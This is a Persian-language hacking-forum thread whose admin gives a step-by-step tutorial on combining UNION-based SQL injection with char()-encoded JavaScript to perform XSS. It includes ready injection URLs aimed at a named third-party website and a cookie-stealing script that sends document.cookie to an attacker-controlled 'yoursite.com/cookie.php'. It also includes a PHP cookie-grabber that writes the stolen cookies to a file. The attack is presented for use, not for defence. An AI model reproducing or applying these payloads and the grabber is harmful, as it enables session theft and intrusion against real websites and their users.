نمایش نتایج: از شماره 1 تا 2 , از مجموع 2

موضوع: متد XFS ( حملات XSS با استفاده از SQL Injection)

  1. #1
    موسس و مدیر
    نمی‌دانم در کدامین کوچه جستجویت کنم ؟ آسوده بخواب مادر بیمارم
    تاریخ عضویت
    Feb 2010
    محل سکونت
    13 78 57
    نوشته ها
    13,577
    تشکر تشکر کرده 
    15,753
    تشکر تشکر شده 
    17,227
    تشکر شده در
    4,905 پست
    حالت من : Khoonsard
    قدرت امتیاز دهی
    24982
    Array

    پیش فرض متد XFS ( حملات XSS با استفاده از SQL Injection)

    متد XFS ( حملات XSS با استفاده از SQL Injection)
    زندگی در بردگی شرمندگی است * معنی آزاد بودن زندگی است
    سر که خم گردد به پای دیگران * بر تن مردان بود بار گران




  2. کاربر مقابل از Mohamad عزیز به خاطر این پست مفید تشکر کرده است:


  3. #2
    موسس و مدیر
    نمی‌دانم در کدامین کوچه جستجویت کنم ؟ آسوده بخواب مادر بیمارم
    تاریخ عضویت
    Feb 2010
    محل سکونت
    13 78 57
    نوشته ها
    13,577
    تشکر تشکر کرده 
    15,753
    تشکر تشکر شده 
    17,227
    تشکر شده در
    4,905 پست
    حالت من : Khoonsard
    قدرت امتیاز دهی
    24982
    Array

    پیش فرض

    XFS چیست ؟

    XFS نوعی از حملات SQL Injection تحریف شده میباشد که به هکر اجازه میدهد با استفاده از تابع ()char کد های جاوا اسکریپت را اجرا کند.
    وظیفه تابع ()char تبدیل کدهای اسکی به کاراکتر است که ما میتوانیم با استفاده از انها کدهای جاوا اسکریپت را اجرا کنیم. حملات XFS اغلب مواقع در حملات XSS و دزدین کوکی ها و واضحا SQL Injection استفاده میشوند.

    نیاز ما برای این حملات چیست ؟

    - تبدیل دستورات مخرب به کد اسکی
    - استفاده از تابع ()char

    ---------------------------------------------------------------------------------------------------

    مثال :

    در ابتدا اولین چیزی که شما نیاز دارید تبدیل کننده به کد های اسکی است و شما این کار را با رفتن به سایت زیر میتوانین انجام بدین :

    کد:
    http://www.easycalculation.com/ascii-hex.php

    بنابراین اگر شما دستور مخرب را در تابع ()char قرار بدین میتوانید کد های جاوا اسکریپت را اجرا کنید بنابر این شما میتوانید حمله XSS انجام بدین ولی در هنگام نوشتن و یا تبدیل کردن کد مخرب به کد اسکی شما به هیچ وجه نباید از فاصله (Space) استفاده کنید.
    اما با این حال میتوانید حمله را انجام داده و کوکی را دزدیده و یا خیلی کارهای دیگری انجام بدین:

    برای مثال کد شما قبل از تبدیل به شکل زیر نمیتواند باشد :


    کد:
    <script > alert(document.cookie) </script>

    چرا ؟! به خاطر این که کد بالا شامل فاصله (Space) میباشد.

    کد زیر نمونه از یک کد صیح میباشد که اماده برای تبدیل به کد اسکی است :


    کد:
    <script>alert(document.cookie)</script>

    که پس از تبدیل به شکل زیر شبیه خواهد بود :



    کد:
    60 115 99 114 105 112 116 62 97 108 101 114 116 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 41 60 47 115 99 114 105 112 116 62

    اما قبل از این که کدها در تابع ()char قرار بگیرند , فاصله هایی که در کدهای تبدیل شده به اسکی وجود دارند باید تبدیل به "," بشوند.

    به مثال زیر توجه کنید :


    کد:
    char(60,115,99,114,105,112 ....)

    خب تنها کاری که من کردم یک char نوشتم و پرانتزی جلوی ان باز کردم و کدهایی که تبدیل به اسکی شده بودن را در ان پرانتز قرار دادم و فاصله هایی که در کدهای تبدیل شده به اسکی بود را به "," تبدیل کردم .

    خب من از قبل یه تارگت خوب پیدا کردم و تعداد کلومن هاش رو با یک اینجکشن ساده بدست اوردم . خب حالا به مثال زیر خوب دقت کنید :


    کد:
    http://www.pentagonusa.com/projects/archive.php?CategoryID=-98.9+union+select+1,2,char(ASCII_CODE),4,5,6,7,8,9,10,11,12--

    خب کلومن 3 که در صفحه نمایش داده میشود رو من بهش میتونم کد اسکی رو تزریق کنم.

    یه مثالی که اجرا خواهیم کرد کد زیر است :


    کد:
    <SCRIPT>alert('xss')</script>
    که اگر به کد اسکی تبدیل کنم کد زیر خواهد بود :

    کد:
    60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 41 60 47 115 99 114 105 112 116 62

    حال برای تست , کد را که بخواهیم تزریق کنیم به شکل زیر خواهد بود :


    کد:
    http://www.pentagonusa.com/projects/archive.php?CategoryID=-1+union+select+1,2,char%2860,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,60,47,115,99,114,105,112,116,62%29,4,5,6,7,8,9,10,11,12--

    حال شما میتوانید کوکی را با استفاده از دستور زیر بدزدین . به مثال زیر توجه کنین :

    کد:
    <SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='+escape(document.cookie)</SCRIPT>
    تبدیل شده به کد اسکی :

    کد:
    60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 82 73 80 84 62
    فایل cookie.php اسکریپتی برای دزدین کوکی میباشد.
    کد زیر اسکریپتی در زبان PHP است که شما میتوانید ان را در جایی اپلود کرده و به جای ادرس زیر که در کد بالا قرار داده بودم قرار بدهید:

    کد:
    'http://www.yoursite.com/cookie.php?


    اینم اسکریپت کوکی گربر ( اسکریپتی برای دزدین کوکی : )

    کد:
     <?php
    
    
     $cookies = $_GET["cookie"];
    
     if($cookies)
    
     {
    
    
     $grab = fopen("grab.txt","a");
    
     fputs($grab, $cookies . "\r\n");
    
     fclose($grab);
    
    
     }
    
    
     ?>
    زندگی در بردگی شرمندگی است * معنی آزاد بودن زندگی است
    سر که خم گردد به پای دیگران * بر تن مردان بود بار گران




  4. 2 کاربر مقابل از Mohamad عزیز به خاطر این پست مفید تشکر کرده اند.


برچسب ها برای این تاپیک

علاقه مندی ها (بوک مارک ها)

علاقه مندی ها (بوک مارک ها)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  

http://www.worldup.ir/